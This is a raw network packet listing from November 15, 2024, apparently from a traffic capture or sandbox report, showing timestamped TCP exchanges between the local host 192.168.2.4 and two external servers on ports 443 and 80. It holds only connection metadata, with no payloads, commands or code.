Nov 15, 2024 18:14:13.440480947 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440685987 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440742016 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.440748930 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441157103 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441217899 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.441227913 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441322088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441378117 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.441385031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441493034 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441551924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.441560030 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441689014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.441745996 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.441755056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442004919 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442065001 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.442075014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442230940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442290068 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.442298889 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442332983 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442389011 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.442398071 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442614079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442667007 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.442673922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442842960 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.442899942 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.442907095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443034887 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443099022 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.443106890 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443286896 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443342924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.443352938 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443510056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443571091 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.443578959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443672895 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443728924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.443734884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443793058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443799019 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.443806887 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.443835974 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.444236040 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.444307089 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.444318056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.444329023 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.444380045 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.444385052 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.444408894 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.444444895 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.444452047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.444477081 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.445211887 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445261002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445286036 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.445291996 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445334911 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.445343018 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445399046 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.445405960 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445890903 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445930004 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445952892 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.445959091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.445997953 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.446546078 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.446633101 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.446640015 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.468066931 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.468187094 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.468252897 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.511179924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.518069029 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.518203020 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.518260002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.542738914 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.542838097 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.542870998 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.543519020 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.543601036 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.543617010 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.550144911 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.550249100 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.550262928 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.551230907 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.551309109 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.551341057 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.551795959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.551867008 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.551879883 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.552470922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.552537918 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.552551031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.553188086 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.553265095 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.553278923 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.554682970 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.554753065 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.554766893 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.554953098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.555015087 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.555027962 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.555233002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.555327892 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.555341959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.555659056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.555732965 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.555746078 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.555953026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.556022882 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.556035995 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.556289911 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.556359053 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.556370974 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.557002068 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.557071924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.557085037 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.557591915 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.557660103 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.557673931 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.557770967 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.557836056 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.557847977 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.558108091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.558176041 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.558188915 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.558345079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.558410883 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.558423042 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.558873892 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.558938026 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.558949947 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.559480906 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.559547901 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.559561968 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.559758902 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.559827089 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.559839964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560030937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560094118 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.560106993 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560300112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560365915 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.560378075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560528994 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560594082 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.560607910 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560911894 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.560983896 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.560997009 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.561503887 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.561567068 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.561579943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.561919928 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.561985016 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.561996937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.562052965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.563074112 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.565711975 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:16.432041883 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:26.460429907 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:26.465701103 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:26.465878963 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:26.465945005 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:26.470901012 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125089884 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125200033 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125251055 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.125272989 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125325918 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125375032 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125384092 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.125441074 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125478029 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.125488997 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125540018 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125582933 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.125587940 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125638962 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.125688076 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.130619049 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.130671024 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.130722046 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.242325068 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242376089 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242449999 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242470026 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.242520094 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242568016 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.242572069 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242620945 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242671013 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242671013 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.242671013 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.242717981 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242763042 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.242840052 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242888927 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242938042 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.242938995 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.243258953 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.243309021 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.243360043 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.243412018 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.243458986 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.243458986 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.243510008 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.243557930 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.244294882 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.244362116 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.244409084 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.244422913 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.244489908 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.244524002 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.244600058 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.245094061 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.245142937 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.247881889 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.247931957 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.247989893 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.247997046 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.248040915 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.248089075 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.359273911 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359353065 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359376907 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359435081 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359519958 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359541893 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.359541893 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.359569073 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359616995 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.359617949 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359668970 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359715939 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.359719038 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359771013 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359818935 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.359838009 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359904051 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359946966 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.359951973 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360012054 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360061884 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360063076 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360111952 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360161066 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360161066 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360212088 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360259056 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360259056 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360308886 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360353947 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360358000 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360402107 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360450983 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360467911 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360517025 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360563993 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360580921 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360631943 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360680103 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360696077 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360752106 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360799074 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360800982 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360852003 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360898018 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360898018 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360949039 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.360995054 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.360997915 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361397028 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361447096 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.361464977 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361532927 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361577988 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.361582994 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361632109 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361676931 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.361680031 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361730099 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361788034 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.361946106 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361979008 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.361998081 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.362051010 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.362068892 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.362118006 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.362118959 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.362170935 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.362215996 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.362219095 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.362270117 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.362317085 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.365907907 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.365988970 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.366040945 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.476334095 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476412058 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476463079 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476507902 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.476543903 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476613998 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476680040 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476684093 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.476733923 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.476749897 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476824045 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476871967 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.476875067 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476943016 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.476991892 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477010012 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477081060 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477130890 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477147102 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477191925 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477237940 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477237940 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477288961 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477336884 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477340937 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477390051 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477437019 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477438927 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477488041 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477535963 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477535963 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477586985 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477633953 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477636099 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477684021 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477730989 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477730989 CET	80	49738	192.3.243.136	192.168.2.4
